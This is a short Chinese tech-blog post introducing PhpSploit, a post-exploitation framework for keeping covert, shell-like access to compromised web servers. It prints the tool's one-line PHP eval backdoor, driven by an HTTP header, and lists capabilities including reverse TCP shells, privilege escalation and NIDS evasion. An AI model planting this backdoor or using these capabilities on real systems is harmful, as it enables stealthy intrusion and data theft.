今天给大家介绍的是一款名叫PhpSploit的远程控制框架,该工具可以帮助攻击者在客户端与Web服务器端之间建立隐蔽性极强的交互式链接(类似Shell)。简而言之,这是一款后渗透利用工具,它能够让攻击者与目标主机(例如被入侵的Web服务器)维持访问链接,并实现提权操作。
该工具会对标准客户端请求以及Web服务器相关请求的HTTP头数据进行混淆处理,并利用一个小型的多态后门来实现隐蔽通信:
<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>
1. 提供了超过20款自动化后渗透利用工具;
2. 运行命令、浏览文件系统、绕过PHP安全限制;
3. 在目标客户端与攻击者端之间实现文件的上传和下载;
4. 通过本地文本编辑器编辑远程文件;
5. 在目标系统中运行SQL语句;
6. 生成反向TCP Shell;
1. 专为偏执狂设计;
2. 日志分析以及NIDS签名检测机制几乎无法检测到它;
3. 绕过安全模式以及常见PHP安全限制;
4. 通信信息隐藏在HTTP头中;
5. 加载的Payload经过了混淆处理以绕过NIDS;
6. 支持http/https/socks4/socks5代理;
1. 跨平台;
2. 强大的界面,完整的命令支持;
3. 提供了会话保存/加载功能;
4. 支持大型Payload,支持多重请求;
5. 提供了强大的、高度可配置的设置引擎;
6. 每一个设置(例如用户代理)都有多态模式;
7. 提供了完整的插件开发API;
1. GNU/Linux
2. MacOS X
1. GNU/Linux
2. BSDLike
3. MacOS X
4. WindowsNT
【GitHub传送门】
挖掘利器Andro Tickler:安卓应用渗透测试和审核工具箱